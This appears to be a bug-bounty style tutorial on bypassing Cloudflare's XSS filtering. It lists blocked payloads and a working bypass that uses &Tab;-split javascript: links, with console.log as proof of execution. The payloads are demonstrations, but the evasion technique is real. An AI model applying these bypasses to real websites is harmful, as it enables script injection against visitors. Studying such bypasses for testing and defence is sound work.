XSS using console.log() for Bypass Cloudflare

Cross-Site Scripting (XSS) is an attack that allows attackers to inject malicious scripts into a web page, which will be executed by unsuspecting users' browsers. This type of attack often relies on JavaScript functions like alert(), prompt(), and confirm() to demonstrate its success. However, security services like Cloudflare often prevent successful attacks by blocking these functions. In this article, we will explore alternatives to demonstrate the success of an XSS attack and bypass Cloudflare's protection.

Overcoming Cloudflare Protection

We attempted XSS attacks using basic payloads like
a. <script>alert()</script>
b. <svg onload=alert()>
c. <body onload=alert()>
d. <img src=x onerror=alert()>
e. <a href=javascript:alert()>XSS</a>

However, all of these payloads were blocked by Cloudflare and didn't provide evidence of a successful attack.

Using Anchor Tags with HTML Entities into Javascript Protocol

Then, we tried using anchor tags by injecting HTML Entities into the javascript protocol and was also blocked by Cloudflare.

Payload :
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:alert()">XSS</a> 

Related Article : 
Reflected XSS Bypass Payloads with HTML Entities : Kaskus Bug Bounty

Checking What Cloudflare Blocks

To confirm what Cloudflare was actually blocking, we removed the `alert()` function from the payload to observe the response. The result showed that the call to the `alert()` function was blocked, not the JavaScript protocol itself.

Payload :
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:">XSS</a> 

Response :
<a href="j a v a s c r i p t:>XSS</a>

Replacing alert() with prompt() and confirm()

We attempted to replace `alert()` with `prompt()` and `confirm()`, but the results remained the same; Cloudflare successfully blocked them.

Using document.write() as an Alternative

Next, we tried using `document.write()`, but Cloudflare still blocked this function.

Payload :
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:document.write()">XSS</a>

Final Payload: Using console.log()

As a final attempt, we used `console.log()` as the payload.

Payload :
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:console.log(1337)">XSS</a>

successfully bypassed Cloudflare's protection. The result showed that `console.log(1337)` was executed.


Conclusion

While alert(), prompt(), and confirm() are often used as proof of a successful XSS attack, the attack itself doesn't depend on these functions. Cloudflare's protection blocks these functions, but with exploration and creativity, we were able to demonstrate the success of the attack using `console.log()`. Understanding how security protections like Cloudflare work helps attackers search for and try different methods to overcome these protections. Using encode characters and unique character combinations are some useful techniques in finding ways to avoid blocking and demonstrate the success of an XSS attack efficiently.